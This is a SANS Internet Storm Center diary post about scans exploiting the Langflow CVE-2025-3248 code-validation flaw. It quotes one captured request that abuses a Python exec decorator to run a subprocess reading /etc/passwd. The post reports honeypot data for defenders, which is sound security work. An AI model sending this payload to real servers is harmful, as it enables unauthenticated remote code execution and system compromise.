[Exploit Attempts for Recent Langflow AI Vulnerability (CVE-2025-3248)](/forums/diary/Exploit+Attempts+for+Recent+Langflow+AI+Vulnerability+CVE20253248/31850/)===============================================================================================================================================================* * [](http://www.facebook.com/sharer.php?u=https%3A%2F%2Fisc.sans.edu%2Fforums%2Fdiary%2F31850 ‘Share on Facebook’)* [](http://twitter.com/share?text=Exploit%20Attempts%20for%20Recent%20Langflow%20AI%20Vulnerability%20%28CVE-2025-3248%29&url=https%3A%2F%2Fisc.sans.edu%2Fforums%2Fdiary%2F31850&via=SANS_ISC ‘Share on Twitter’) **Published** : 2025-04-12. **Last Updated** : 2025-04-13 00:21:28 UTC **by** [Johannes Ullrich](https://plus.google.com/101587262224166552564?rel=author) (Version: 1) [0 comment(s)](/diary/Exploit+Attempts+for+Recent+Langflow+AI+Vulnerability+CVE20253248/31850/#comments) Two weeks ago, version 1.3.0 of Langflow was released. The release notes list many fixes but do not mention that one of the ‘Bug Fixes’ addresses a major vulnerability. Instead, the release notes state, ‘auth current user on code validation.’ -[1-]Its website states, ‘Langflow is a low-code tool for developers that makes it easier to build powerful AI agents and workflows that can use any API, model, or database.’ It can be installed as a Python package, a standalone desktop application, or as a cloud-hosted service. DataStax provides a ready-built cloud-hosted environment for Langflow.The vulnerability went somewhat unnoticed, at least by me, until Horizon3 created a detailed writeup showing how easy it is to exploit the vulnerability and provide proof of concept exploit. Horizon3 published its blog on April 9th -[2-]. We saw a first hit to the vulnerable URL, ‘[/api/v1/validate/code](https://isc.sans.edu/weblogs/urlhistory.html?url=L2FwaS92MS92YWxpZGF0ZS9jb2Rl)’, on April 10th. Today (April 12th), we saw a significant increase in hits for this URL.The requests we are seeing are vulnerability scans. They attempt to retrieve the content of ‘/etc/passwd’ to verify if the target system:> `POST /api/v1/validate/code HTTP/1.1` > `> Host: [redacted]` > `> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4` > `> Connection: close` > `> Content-Length: 125` > `> Content-Type: application/json` > `> Accept-Encoding: gzip`>> `{‘code’: ‘@exec(‘raise Exception(__import__(–‘subprocess–‘).check_output([–‘cat–‘, –‘/etc/passwd–‘]))’)–ndef foo():–n pass’}` >Not all of our honeypots report request bodies. So far, this is the only request body we recorded. So far, all of the requests originate from TOR exit nodes.-[1-] https://github.com/langflow-ai/langflow/releases/tag/1.3.0 -[2-] https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/— Johannes B. Ullrich, Ph.D. , Dean of Research, [SANS.edu](https://sans.edu) [Twitter](https://jbu.me/164)-| Keywords: [langflow](/tag.html?tag=langflow)[0 comment(s)](/diary/Exploit+Attempts+for+Recent+Langflow+AI+Vulnerability+CVE20253248/31850/#comments)
Related Tags:
NAICS: 61 – Educational Services
NAICS: 611 – Educational Services
NAICS: 54 – Professional
Scientific
Technical Services
NAICS: 541 – Professional
Scientific
Technical Services
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 51 – Information
Blog: SANS Internet Storm Center
Application Layer Protocol: Web Protocols
Application Layer Protocol
Associated Indicators:
null